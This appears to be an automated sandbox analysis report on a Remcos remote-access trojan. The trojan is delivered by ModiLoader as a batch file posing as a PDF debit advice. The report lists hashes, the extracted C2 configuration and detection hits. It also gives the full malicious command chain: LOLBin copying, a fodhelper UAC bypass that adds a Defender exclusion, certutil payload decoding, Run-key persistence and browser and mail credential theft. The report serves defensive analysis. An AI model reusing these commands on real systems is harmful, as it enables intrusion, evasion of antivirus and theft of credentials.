Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
27-03-2024 02:41
Static task
static1
Behavioral task
behavioral1
Sample
DEBIT_ADVICE_000610PAY001522024.PDF.bat
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
DEBIT_ADVICE_000610PAY001522024.PDF.bat
Resource
win10v2004-20240226-en
General
-
Target
DEBIT_ADVICE_000610PAY001522024.PDF.bat
-
Size
3.1MB
-
MD5
37a23ddeb4d10dc479c3cda8bcad8fa6
-
SHA1
8cf2add3ffd2840c508bd8b06f9a29d9a4fb7bf5
-
SHA256
0a2ae63e384bb787bfaf113777640ad36ce8aabc235fd071de1cc746f32c1701
-
SHA512
aae48f4509124f6e041e96a32da0071727244d909b84b5189fd153a74f07a5dc208f4e46b98166d0aa9b25c19277796c8c01f4faaec793c95c8c03b83ef05bba
-
SSDEEP
24576:2wyJPcV/Hrrz6jT6vaQrAAAy4QE1FpVJQQul6kE82zg38H6HKpLJrvvfzrEZnfQL:9yJPcVHQNQrAAHEPJQT7Z38dEog3xfO
Malware Config
Extracted
remcos
RemoteHost
127.0.0.1:45671
127.0.0.1:55677
192.3.101.8:55677
192.3.101.8:45671
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-2P1XPK
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 13 IoCs
resource yara_rule behavioral1/memory/1796-144-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-146-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-147-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-148-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-149-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-151-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-153-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-154-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-156-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-157-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-159-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-175-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-179-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM -
Detects executables built or packed with MPress PE compressor 15 IoCs
resource yara_rule behavioral1/memory/2884-162-0x0000000000400000-0x0000000000478000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2884-165-0x0000000000400000-0x0000000000478000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/1276-176-0x0000000000400000-0x0000000000424000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2828-169-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2828-174-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2828-172-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2884-168-0x0000000000400000-0x0000000000478000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2828-177-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/1276-180-0x0000000000400000-0x0000000000424000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/1276-182-0x0000000000400000-0x0000000000424000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/1276-184-0x0000000000400000-0x0000000000424000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2884-189-0x0000000000400000-0x0000000000478000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2828-191-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/1796-192-0x000000001FDC0000-0x000000001FDD9000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/1796-195-0x000000001FDC0000-0x000000001FDD9000-memory.dmp INDICATOR_EXE_Packed_MPress -
Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 3 IoCs
resource yara_rule behavioral1/memory/2828-174-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store behavioral1/memory/2828-177-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store behavioral1/memory/2828-191-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store -
Detects executables referencing many email and collaboration clients. Observed in information stealers 3 IoCs
resource yara_rule behavioral1/memory/2828-174-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients behavioral1/memory/2828-177-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients behavioral1/memory/2828-191-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients -
ModiLoader Second Stage 1 IoCs
resource yara_rule behavioral1/memory/2000-59-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 -
NirSoft MailPassView 3 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral1/memory/2828-174-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView behavioral1/memory/2828-177-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView behavioral1/memory/2828-191-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral1/memory/2884-168-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView behavioral1/memory/2884-189-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Nirsoft 7 IoCs
resource yara_rule behavioral1/memory/2828-174-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral1/memory/2884-168-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/2828-177-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral1/memory/1276-182-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral1/memory/1276-184-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral1/memory/2884-189-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/2828-191-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft -
Executes dropped EXE 18 IoCs
pid Process 1276 alpha.exe 1404 alpha.exe 2584 alpha.exe 2652 xkn.exe 2720 alpha.exe 2688 alpha.exe 2876 kn.exe 2548 alpha.exe 2936 kn.exe 2216 alpha.exe 2000 Lewxa.com 1036 alpha.exe 2272 alpha.exe 2332 alpha.exe 768 alpha.exe 2232 alpha.exe 2068 3271947.exe 644 3271947.exe -
Loads dropped DLL 11 IoCs
pid Process 2732 cmd.exe 2732 cmd.exe 2732 cmd.exe 2584 alpha.exe 2652 xkn.exe 2652 xkn.exe 2652 xkn.exe 2732 cmd.exe 2688 alpha.exe 2732 cmd.exe 2548 alpha.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts colorcpl.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\Koomxsve = "C:\\Users\\Public\\Koomxsve.url" Lewxa.com -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1796 set thread context of 2884 1796 colorcpl.exe 67 PID 1796 set thread context of 2828 1796 colorcpl.exe 68 PID 1796 set thread context of 1276 1796 colorcpl.exe 69 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2928 1796 WerFault.exe 64 -
Kills process with taskkill 2 IoCs
pid Process 1256 taskkill.exe 1656 taskkill.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\ms-settings\shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\ms-settings\shell\open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users " reg.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\ms-settings\shell\open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\ms-settings reg.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2180 reg.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2000 Lewxa.com -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2652 xkn.exe 2884 colorcpl.exe 2884 colorcpl.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 1796 colorcpl.exe 1796 colorcpl.exe 1796 colorcpl.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2652 xkn.exe Token: SeDebugPrivilege 1256 taskkill.exe Token: SeDebugPrivilege 1656 taskkill.exe Token: SeDebugPrivilege 1276 colorcpl.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1796 colorcpl.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2732 wrote to memory of 2828 2732 cmd.exe 29 PID 2732 wrote to memory of 2828 2732 cmd.exe 29 PID 2732 wrote to memory of 2828 2732 cmd.exe 29 PID 2828 wrote to memory of 2836 2828 cmd.exe 30 PID 2828 wrote to memory of 2836 2828 cmd.exe 30 PID 2828 wrote to memory of 2836 2828 cmd.exe 30 PID 2732 wrote to memory of 1276 2732 cmd.exe 31 PID 2732 wrote to memory of 1276 2732 cmd.exe 31 PID 2732 wrote to memory of 1276 2732 cmd.exe 31 PID 1276 wrote to memory of 2920 1276 alpha.exe 32 PID 1276 wrote to memory of 2920 1276 alpha.exe 32 PID 1276 wrote to memory of 2920 1276 alpha.exe 32 PID 2732 wrote to memory of 1404 2732 cmd.exe 33 PID 2732 wrote to memory of 1404 2732 cmd.exe 33 PID 2732 wrote to memory of 1404 2732 cmd.exe 33 PID 1404 wrote to memory of 2932 1404 alpha.exe 34 PID 1404 wrote to memory of 2932 1404 alpha.exe 34 PID 1404 wrote to memory of 2932 1404 alpha.exe 34 PID 2732 wrote to memory of 2584 2732 cmd.exe 35 PID 2732 wrote to memory of 2584 2732 cmd.exe 35 PID 2732 wrote to memory of 2584 2732 cmd.exe 35 PID 2584 wrote to memory of 2652 2584 alpha.exe 36 PID 2584 wrote to memory of 2652 2584 alpha.exe 36 PID 2584 wrote to memory of 2652 2584 alpha.exe 36 PID 2652 wrote to memory of 2720 2652 xkn.exe 37 PID 2652 wrote to memory of 2720 2652 xkn.exe 37 PID 2652 wrote to memory of 2720 2652 xkn.exe 37 PID 2720 wrote to memory of 2180 2720 alpha.exe 38 PID 2720 wrote to memory of 2180 2720 alpha.exe 38 PID 2720 wrote to memory of 2180 2720 alpha.exe 38 PID 2732 wrote to memory of 2688 2732 cmd.exe 39 PID 2732 wrote to memory of 2688 2732 cmd.exe 39 PID 2732 wrote to memory of 2688 2732 cmd.exe 39 PID 2688 wrote to memory of 2876 2688 alpha.exe 40 PID 2688 wrote to memory of 2876 2688 alpha.exe 40 PID 2688 wrote to memory of 2876 2688 alpha.exe 40 PID 2732 wrote to memory of 2548 2732 cmd.exe 41 PID 2732 wrote to memory of 2548 2732 cmd.exe 41 PID 2732 wrote to memory of 2548 2732 cmd.exe 41 PID 2548 wrote to memory of 2936 2548 alpha.exe 42 PID 2548 wrote to memory of 2936 2548 alpha.exe 42 PID 2548 wrote to memory of 2936 2548 alpha.exe 42 PID 2732 wrote to memory of 2000 2732 cmd.exe 43 PID 2732 wrote to memory of 2000 2732 cmd.exe 43 PID 2732 wrote to memory of 2000 2732 cmd.exe 43 PID 2732 wrote to memory of 2000 2732 cmd.exe 43 PID 2732 wrote to memory of 2216 2732 cmd.exe 44 PID 2732 wrote to memory of 2216 2732 cmd.exe 44 PID 2732 wrote to memory of 2216 2732 cmd.exe 44 PID 2732 wrote to memory of 1036 2732 cmd.exe 45 PID 2732 wrote to memory of 1036 2732 cmd.exe 45 PID 2732 wrote to memory of 1036 2732 cmd.exe 45 PID 2732 wrote to memory of 2272 2732 cmd.exe 46 PID 2732 wrote to memory of 2272 2732 cmd.exe 46 PID 2732 wrote to memory of 2272 2732 cmd.exe 46 PID 2732 wrote to memory of 2332 2732 cmd.exe 47 PID 2732 wrote to memory of 2332 2732 cmd.exe 47 PID 2732 wrote to memory of 2332 2732 cmd.exe 47 PID 2732 wrote to memory of 768 2732 cmd.exe 48 PID 2732 wrote to memory of 768 2732 cmd.exe 48 PID 2732 wrote to memory of 768 2732 cmd.exe 48 PID 768 wrote to memory of 1256 768 alpha.exe 49 PID 768 wrote to memory of 1256 768 alpha.exe 49 PID 768 wrote to memory of 1256 768 alpha.exe 49
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\system32\cmd.execmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe3⤵PID:2836
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1276 -
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe3⤵PID:2920
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵PID:2932
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\system32\reg.exereg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "5⤵
- Modifies registry class
- Modifies registry key
PID:2180
-
-
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 92⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 93⤵
- Executes dropped EXE
PID:2876
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 122⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 123⤵
- Executes dropped EXE
PID:2936
-
-
-
C:\Users\Public\Libraries\Lewxa.comC:\\Users\\Public\\Libraries\\Lewxa.com2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2000 -
C:\Windows\SysWOW64\cmd.execmd /c mkdir "\\?\C:\Windows "3⤵PID:2536
-
-
C:\Windows\SysWOW64\cmd.execmd /c mkdir "\\?\C:\Windows \System32"3⤵PID:1520
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Windows \System32\3271947.exe"3⤵PID:2416
-
C:\Windows \System32\3271947.exe"C:\Windows \System32\3271947.exe"4⤵
- Executes dropped EXE
PID:2068
-
-
C:\Windows \System32\3271947.exe"C:\Windows \System32\3271947.exe"4⤵
- Executes dropped EXE
PID:644
-
-
-
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Lewxa.com C:\\Users\\Public\\Libraries\\Koomxsve.PIF3⤵PID:2124
-
-
C:\Windows\SysWOW64\colorcpl.exeC:\Windows\System32\colorcpl.exe3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1796 -
C:\Windows\SysWOW64\colorcpl.exeC:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\fqyavcahylsvrjssobrasozuunjhwvngw"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2884
-
-
C:\Windows\SysWOW64\colorcpl.exeC:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\hsetw"4⤵
- Accesses Microsoft Outlook accounts
PID:2828
-
-
C:\Windows\SysWOW64\colorcpl.exeC:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\smrdxmvc"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1276
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 6964⤵
- Program crash
PID:2928
-
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2216
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1036
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2272
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2332
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1256
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe2⤵
- Executes dropped EXE
PID:2232 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettingsAdminFlows.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
2.2MB
MD58f6b3132069a25963b93083743e160dd
SHA1364112fc579f11dfa82a3c1078ec19706cd6dfda
SHA2565184b2c7c5ffbaf8b8c9bac27545f09447b61d619a2f2bf472570b9ebec5747c
SHA512af3051aeed9de9931f12d48cd22fef3273f9350a1cdd3c476fa02f7550288f7a96112f311d4dadcf61f0a67c93c22ce2999fb6253c8841b9d399e710b8518938
-
Filesize
1.1MB
MD504aba5a372c8dac9affd6f1578b478b3
SHA11e0d764539cbf2e86e0d59b83f407b429f61fdb7
SHA256b27a5e00f3339d8020da21dabc1c53e001bf5d4a809c47cee65f3e9383568411
SHA5124d69053814b86bd13b59ca8b147a5331d0eace3ed2aaa936dc35086fdba8ef44d757bdc788eec61338f443578f98b8859f8dd7c7eeef486cab9ecb8eb5be15a3
-
Filesize
128KB
MD5231ce1e1d7d98b44371ffff407d68b59
SHA125510d0f6353dbf0c9f72fc880de7585e34b28ff
SHA25630951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96
SHA512520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612
-
Filesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
Filesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d